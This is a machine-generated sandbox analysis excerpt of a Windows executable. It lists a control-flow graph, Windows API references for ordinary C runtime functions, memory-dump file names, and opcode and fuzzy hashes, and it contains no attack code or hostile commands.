                                                                                                                                                                  control_flow_graph 819 7ff69002c270-7ff69002c295 820 7ff69002c29b-7ff69002c29e 819->820 821 7ff69002c563 819->821 823 7ff69002c2d7-7ff69002c303 820->823 824 7ff69002c2a0-7ff69002c2d2 call 7ff690029b24 820->824 822 7ff69002c565-7ff69002c575 821->822 825 7ff69002c30e-7ff69002c314 823->825 826 7ff69002c305-7ff69002c30c 823->826 824->822 828 7ff69002c316-7ff69002c31f call 7ff69002b630 825->828 829 7ff69002c324-7ff69002c339 call 7ff690032c2c 825->829 826->824 826->825 828->829 834 7ff69002c33f-7ff69002c348 829->834 835 7ff69002c453-7ff69002c45c 829->835 834->835 838 7ff69002c34e-7ff69002c352 834->838 836 7ff69002c4b0-7ff69002c4d5 WriteFile 835->836 837 7ff69002c45e-7ff69002c464 835->837 839 7ff69002c4d7-7ff69002c4dd GetLastError 836->839 840 7ff69002c4e0 836->840 841 7ff69002c466-7ff69002c469 837->841 842 7ff69002c49c-7ff69002c4ae call 7ff69002bd28 837->842 843 7ff69002c354-7ff69002c35c call 7ff690023ae0 838->843 844 7ff69002c363-7ff69002c36e 838->844 839->840 846 7ff69002c4e3 840->846 847 7ff69002c488-7ff69002c49a call 7ff69002bf48 841->847 848 7ff69002c46b-7ff69002c46e 841->848 862 7ff69002c440-7ff69002c447 842->862 843->844 850 7ff69002c370-7ff69002c379 844->850 851 7ff69002c37f-7ff69002c394 GetConsoleMode 844->851 855 7ff69002c4e8 846->855 847->862 856 7ff69002c4f4-7ff69002c4fe 848->856 857 7ff69002c474-7ff69002c486 call 7ff69002be2c 848->857 850->835 850->851 852 7ff69002c44c 851->852 853 7ff69002c39a-7ff69002c3a0 851->853 852->835 860 7ff69002c429-7ff69002c43b call 7ff69002b8b0 853->860 861 7ff69002c3a6-7ff69002c3a9 853->861 863 7ff69002c4ed 855->863 864 7ff69002c55c-7ff69002c561 856->864 865 7ff69002c500-7ff69002c505 856->865 857->862 860->862 869 7ff69002c3ab-7ff69002c3ae 861->869 870 7ff69002c3b4-7ff69002c3c2 861->870 862->855 863->856 864->822 871 7ff69002c507-7ff69002c50a 865->871 872 7ff69002c533-7ff69002c53d 865->872 869->863 869->870 876 7ff69002c420-7ff69002c424 870->876 877 7ff69002c3c4 870->877 878 7ff69002c50c-7ff69002c51b 871->878 879 7ff69002c523-7ff69002c52e call 7ff6900243b0 871->879 874 7ff69002c53f-7ff69002c542 872->874 875 7ff69002c544-7ff69002c553 872->875 874->821 874->875 875->864 876->846 880 7ff69002c3c8-7ff69002c3df call 7ff690032cf8 877->880 878->879 879->872 885 7ff69002c417-7ff69002c41d GetLastError 880->885 886 7ff69002c3e1-7ff69002c3ed 880->886 885->876 887 7ff69002c40c-7ff69002c413 886->887 888 7ff69002c3ef-7ff69002c401 call 7ff690032cf8 886->888 887->876 890 7ff69002c415 887->890 888->885 892 7ff69002c403-7ff69002c40a 888->892 890->880 892->887
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69002C25B), ref: 00007FF69002C38C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69002C25B), ref: 00007FF69002C417
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                  • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                  • Instruction ID: 0219f2ecabbdaf2371d1ac489016fb3e55e351a4e53d8cb56e150af9cfcb5535
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                  • Instruction Fuzzy Hash: 2691B472E08651A5F770DF799450ABD2BA1FB44B88F544179DE0EA6B8DDF38E482C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                  • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                  • Instruction ID: 5952a005980c72c4a21ec1451ba1c3bac91e2bfcf69d06d4c8f20f9078bd3e6a
                                                                                                                                                                  • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                  • Instruction Fuzzy Hash: F6418E22E1878293E7648B7495103696260FFA47A4F109375EB9C83BDDEF7CE5E28700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                  • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                  • Instruction ID: afe7b2b988735ebbddd38d3ccec8b90aff9a20e253ad8cfb1447db602f92aaf3
                                                                                                                                                                  • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C315E25E0D643A2FAB5A7789492BB91381EF4938CF4440B8EA0DC73DFDE2CE8458205
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                  • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                  • Instruction ID: d569a1b56b959919e4391b4fe92eda8a593df69a1d37d3985b962fd582458feb
                                                                                                                                                                  • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 17D05E18F19606A3FB382B705C5A5790352DF9C704F0018B8E94F863DBCD2CE80E4300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                  • Instruction ID: af25e8a45fb27d1b27e653e50c6fae9c672740ecd08210c6cc40224cfedb9dac
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                  • Instruction Fuzzy Hash: A7517461B0968266E7B89E3A940067A6691FF84BBCF144774DE6D877DDCF3CF4418600
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                  • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                  • Instruction ID: eac446635ce7575b9d37d0f62653966e237ec8f5716fa4cd681da9f2521c5fe8
                                                                                                                                                                  • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                  • Instruction Fuzzy Hash: 6111C161A08A8191DA209B39A844169A362FB44BF4F540371EEBD877EECF3CD1518700
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                  • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                  • Instruction ID: f4b8aa3f526a686db3a63d4e4968795ef82b230a5e4a09a1849436b8aedd9eea
                                                                                                                                                                  • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                  • Instruction Fuzzy Hash: CFE08C50F0864262FF39ABF6A8440792292EF98701F0040B0DE0DC735DEE2CE9468300
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF690029CE5,?,?,00000000,00007FF690029D9A), ref: 00007FF690029ED6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF690029CE5,?,?,00000000,00007FF690029D9A), ref: 00007FF690029EE0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                  • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                  • Instruction ID: 3030356d8aea27503f28b97687b9d8cdd9900df51c58f47a08bc158583813bd2
                                                                                                                                                                  • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                  • Instruction Fuzzy Hash: F1218421F1C64261EEB49779A95037D12D2EF847A4F0552B5DA2EC77DACE6CE482C301
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                  • Instruction ID: 7eb7d49f67f8f43a6f4a43045c99bf4c855238541891f3583fbc4642f29adac5
                                                                                                                                                                  • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                  • Instruction Fuzzy Hash: 4641BC32918242A7EA34DA3DA55127D73A2FB96B80F140171DA8EC3798CF3CE503C751
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                  • Opcode ID: 23984c9b0e92b3499d0e452eca00665f4f26c6b08eca85ad94915f629dbeb913
                                                                                                                                                                  • Instruction ID: 2cde29e0d7c62d59738e9bba067541559e27a564004f52a75a2aa519c8185c2d
                                                                                                                                                                  • Opcode Fuzzy Hash: 23984c9b0e92b3499d0e452eca00665f4f26c6b08eca85ad94915f629dbeb913
                                                                                                                                                                  • Instruction Fuzzy Hash: 62218621B0C65165FA759B36A9047BAA651FF45BD8F8C44B0DE0D877CADE7DE081C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                  • Instruction ID: 51178b44efaede3e4e49037e6a1a880cd6dd35f58b245a36aa54042dd8a9664c
                                                                                                                                                                  • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                  • Instruction Fuzzy Hash: FB31AD22E18642A7F725AB3D98413BD2650FF51BA4F5101B5EA2D837DACFBCE442C321
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                  • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                  • Instruction ID: b97b162001098a0d3c7c2f4c1fd85375abab0d468968d46d8b3b1a7ebc7ab250
                                                                                                                                                                  • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                  • Instruction Fuzzy Hash: B921AC36A167069AEB249F78C4412EC33A0FB44318F5406BAD72C86BC9EF38D486CB50
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                  • Instruction ID: 984a404bb94b954902b41c485cb409979f1ab9b72b582eb637424909e4a71bb4
                                                                                                                                                                  • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E117221E1D68191EA709F69940027EA2A4FF96B80F4444B1EF4CD7BDECF3CD9568744
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                  • Instruction ID: b3a918e02be0fa1d3108c34ee9a8faed2bcfedea0e2400f2a863cdcc12a80b37
                                                                                                                                                                  • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                  • Instruction Fuzzy Hash: 86219232A18A8296DB728F28E44177976A0EB98B95F544234EA5DC77EDDF3CD401CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                  • Instruction ID: 0e9434739f93ba86557cd647b26fb1fdb4877b31e6c570a190ab573cdf57f280
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
